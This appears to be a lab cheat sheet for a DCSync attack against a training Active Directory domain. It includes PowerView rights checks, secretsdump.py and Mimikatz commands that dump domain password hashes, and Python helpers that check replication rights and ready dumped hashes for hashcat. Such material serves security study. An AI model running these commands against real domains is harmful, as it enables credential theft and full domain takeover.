DCSync

1. View Group Membership of a Specific User

Command:

Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl
  • Description: PowerView's Get-DomainUser shows the group membership (memberof) of a specific user (adunn) in the target domain, together with the account's objectsid and useraccountcontrol flags. The objectsid is the value the replication-rights check in step 2 filters on.


2. Check User's Replication Rights

Command:

$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
  • Description:

    • Stores the user's SID (the objectsid returned in step 1) in the $sid variable.

    • Uses PowerView's Get-ObjectAcl with -ResolveGUIDs to list the ACEs on the domain object (DC=inlanefreight,DC=local) whose extended-right GUID resolves to a DS-Replication-Get-* name and that are assigned to that SID.

    • DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object; a principal holding only the first cannot pull password hashes. DS-Replication-Get-Changes-In-Filtered-Set is not required.

    • The filter only matches ACEs granted directly to $sid. Rights held through a group (for example membership of the Administrators group) are listed under the group's SID, so repeat the check for the SIDs of the groups returned by step 1.
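The two-rights rule and the group-membership caveat above can be applied offline to the ACEs the step-2 command returns (for instance after piping them to Export-Csv). The following is an added example, not PowerView or HTB code: it accepts records with the same fields the command selects, accepts ObjectAceType either as the resolved name (-ResolveGUIDs) or as the raw GUID, and treats an AccessDenied ACE as overriding an allow. It assumes PowerView reports an unscoped object ACE as 'All'; the sample ACL, the SIDs other than adunn's, and the users bob, carol and dave are constructed for illustration.

```python
"""Offline check of DCSync replication rights over domain-object ACEs.

Added example (not PowerView or HTB code). Input records mirror the fields the
step-2 command selects (AceQualifier, ObjectDN, ActiveDirectoryRights,
SecurityIdentifier, ObjectAceType); with -ResolveGUIDs ObjectAceType is a name,
without it a GUID, and both forms are accepted. Assumed: PowerView prints
'All' for an unscoped (all-zero GUID) object ACE.
"""

# Control access right GUIDs from the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# DRSGetNCChanges only returns password secrets with both of these; the
# In-Filtered-Set right merely adds attributes from the RODC filtered set.
REQUIRED = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
UNSCOPED = {None, "", "All", "00000000-0000-0000-0000-000000000000"}


def normalise_ace_type(value):
    """Map a GUID-form ObjectAceType to its right name; pass names through."""
    if value is None:
        return None
    value = str(value).strip()
    return REPLICATION_RIGHTS.get(value.lower(), value)


def rights_in_ace(ace):
    """Replication rights a single ACE covers (ignores allow/deny)."""
    ad_rights = {r.strip() for r in str(ace.get("ActiveDirectoryRights", "")).split(",")}
    ace_type = normalise_ace_type(ace.get("ObjectAceType"))
    if "GenericAll" in ad_rights:
        return set(REPLICATION_RIGHTS.values())
    if "ExtendedRight" in ad_rights:
        if ace_type in UNSCOPED:            # ExtendedRight on every control access right
            return set(REPLICATION_RIGHTS.values())
        if ace_type in REPLICATION_RIGHTS.values():
            return {ace_type}
    return set()


def check_dcsync(aces, principal_sids):
    """Return (can_dcsync, effective_rights, missing_rights) for a principal.

    principal_sids is the user's SID plus the SIDs of every group it belongs to
    (nested included), because ACEs are listed per trustee SID. Any AccessDenied
    ACE for one of those SIDs overrides an allow; this ignores ACE ordering
    subtleties, which is the conservative choice for a 'can I DCSync' check.
    """
    sids = {s.upper() for s in principal_sids}
    allowed, denied = set(), set()
    for ace in aces:
        if str(ace.get("SecurityIdentifier", "")).upper() not in sids:
            continue
        covered = rights_in_ace(ace)
        if ace.get("AceQualifier") == "AccessAllowed":
            allowed |= covered
        elif ace.get("AceQualifier") == "AccessDenied":
            denied |= covered
    effective = allowed - denied
    missing = REQUIRED - effective
    return not missing, sorted(effective), sorted(missing)


DOMAIN = "S-1-5-21-3842939050-3880317879-2865463114"   # domain SID from step 2
ADUNN = DOMAIN + "-1164"


def _ace(sid, right, qualifier="AccessAllowed", ad_rights="ExtendedRight"):
    return {"AceQualifier": qualifier, "ObjectDN": "DC=inlanefreight,DC=local",
            "ActiveDirectoryRights": ad_rights, "SecurityIdentifier": sid,
            "ObjectAceType": right}


# Constructed ACL: default-style entries plus test principals (not lab data).
SAMPLE_ACL = [
    _ace("S-1-5-32-544", "DS-Replication-Get-Changes"),            # BUILTIN\Administrators
    _ace("S-1-5-32-544", "DS-Replication-Get-Changes-All"),
    _ace(DOMAIN + "-516", "DS-Replication-Get-Changes"),           # Domain Controllers
    _ace(DOMAIN + "-516", "DS-Replication-Get-Changes-All"),
    _ace("S-1-5-9", "DS-Replication-Get-Changes"),                 # Enterprise Domain Controllers
    _ace(ADUNN, "DS-Replication-Get-Changes"),                     # adunn: both rights, as in step 2
    _ace(ADUNN, "DS-Replication-Get-Changes-All"),
    _ace(DOMAIN + "-1200", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),  # bob: Get-Changes only, GUID form
    _ace(DOMAIN + "-1201", None, ad_rights="GenericAll"),          # carol: GenericAll ...
    _ace(DOMAIN + "-1201", "DS-Replication-Get-Changes-All", "AccessDenied"),  # ... minus -All
]

if __name__ == "__main__":
    for name, sids in [("adunn", [ADUNN]), ("bob", [DOMAIN + "-1200"]),
                       ("carol", [DOMAIN + "-1201"]),
                       ("dave via Administrators", [DOMAIN + "-1300", "S-1-5-32-544"])]:
        ok, have, missing = check_dcsync(SAMPLE_ACL, sids)
        print(f"{name}: DCSync={'yes' if ok else 'no'} have={have} missing={missing}")
```

Run it and bob comes out as unable to DCSync despite a matching Replication-Get ACE, carol's GenericAll is neutralised by the explicit deny, and dave only qualifies once the Administrators SID is included, which is exactly what the direct-SID filter in step 2 would miss.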


3. Extract NTLM Hashes from NTDS.dit

Command:

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 -use-vss
  • Description: Impacket's secretsdump.py extracts the NTLM hashes (and Kerberos keys) stored in NTDS.dit on the target Domain Controller (172.16.5.5), authenticating as adunn, and writes them to inlanefreight_hashes.ntds (with .ntds.kerberos and .ntds.cleartext alongside where applicable).

    • Performed from a Linux-based host. The password is prompted for; it can also be given inline as INLANEFREIGHT/adunn:password@172.16.5.5, or replaced by -hashes LMHASH:NTHASH (pass-the-hash) or -k (Kerberos).

    • The flag is -just-dc (not -justdc), which limits the dump to NTDS secrets; -just-dc-ntlm skips the Kerberos keys and -just-dc-user <user> pulls a single account.

    • -use-vss switches from the default DRSUAPI replication method (the actual DCSync, which only needs the rights checked in step 2) to copying NTDS.dit out of a Volume Shadow Copy, which executes commands on the DC and therefore requires local administrator rights there. Omit it to stay within replication rights alone.
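Once the dump lands in inlanefreight_hashes.ntds, the first questions are which accounts share a password, which have a blank one, and whether LM hashes are still being stored. The following is an added example, not Impacket code: a small triage script that assumes the documented output line format `[domain\]sAMAccountName:rid:lmhash:nthash:::` (with -history rows named `<user>_history<N>`) and produces `user:nthash` lines ready for `hashcat -m 1000 --username`. The embedded sample dump is constructed, with placeholder hashes that are not lab or real credentials.

```python
"""Triage a secretsdump.py -outputfile <name>.ntds dump.

Added example, not Impacket code. Assumes the documented line format
    [domain\\]sAMAccountName:rid:lmhash:nthash:::
with -history rows named <user>_history<N>; the sample below is constructed
with placeholder hashes (they are not lab or real credentials).
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.IGNORECASE)
HISTORY_RE = re.compile(r"^(?P<base>.+)_history(?P<n>\d+)$")


def parse_ntds(text):
    """Parse dump lines into dicts; non-matching lines (banners, errors) are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        user = m["user"]
        h = HISTORY_RE.match(user)
        records.append({
            "domain": m["domain"],
            "user": user,
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
            "machine": user.endswith("$"),
            "history": int(h["n"]) if h else None,   # None = current password
        })
    return records


def summarise(records):
    """Findings a reviewer looks for first: reuse, blank passwords, LM storage."""
    live = [r for r in records if r["history"] is None]
    by_nt = defaultdict(list)
    for r in live:
        by_nt[r["nt"]].append(r["user"])
    return {
        "users": [r["user"] for r in live if not r["machine"]],
        "machines": [r["user"] for r in live if r["machine"]],
        "blank_passwords": [r["user"] for r in live if r["nt"] == EMPTY_NT],
        "lm_stored": [r["user"] for r in live if r["lm"] != EMPTY_LM],
        # Same NT hash on several accounts = password reuse (ignore the empty hash).
        "reuse": {nt: users for nt, users in by_nt.items()
                  if len(users) > 1 and nt != EMPTY_NT},
    }


def hashcat_lines(records):
    """Lines for `hashcat -m 1000 --username`, current passwords only."""
    return [f"{r['user']}:{r['nt']}" for r in records if r["history"] is None]


# Constructed sample dump (placeholder hashes, not lab output).
SAMPLE_NTDS = """\
inlanefreight.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c9d1e3f5a2b4c6d8e0f1a3b5c7d9e2f:::
inlanefreight.local\\adunn:1164:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
inlanefreight.local\\svc_backup:1175:1a2b3c4d5e6f70819283a4b5c6d7e8f9:3f2a1b9d0c7e6f5a4b3c2d1e0f9a8b7c:::
inlanefreight.local\\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:5d1f7a2c9b8e4f3a6c0d2e1b7f9a8c4d:::
inlanefreight.local\\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:0a1b2c3d4e5f60718293a4b5c6d7e8f9:::
"""

if __name__ == "__main__":
    recs = parse_ntds(SAMPLE_NTDS)
    s = summarise(recs)
    print(f"{len(s['users'])} users, {len(s['machines'])} machine accounts")
    print("blank passwords:", s["blank_passwords"])
    print("LM hashes stored:", s["lm_stored"])
    for nt, users in s["reuse"].items():
        print(f"NT hash {nt} shared by {', '.join(users)}")
```

On the sample this reports Administrator and adunn sharing one NT hash, Guest with a blank password, and svc_backup with a non-empty LM hash (LM storage still enabled for that account); history rows are kept for reference but excluded from the findings and from the hashcat list.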


4. Perform a DCSync Attack Using Mimikatz

Command:

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
  • Description: Uses Mimikatz to perform a DCSync attack, requesting the specified account (INLANEFREIGHT\administrator) from a Domain Controller over the replication protocol and returning its NTLM hash and Kerberos keys.

    • Mimikatz must run in the security context of a user holding the replication rights from step 2, for example from a shell started with runas /netonly /user:INLANEFREIGHT\adunn powershell.

    • /all dumps every account in the domain (lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /all /csv gives one line per account).
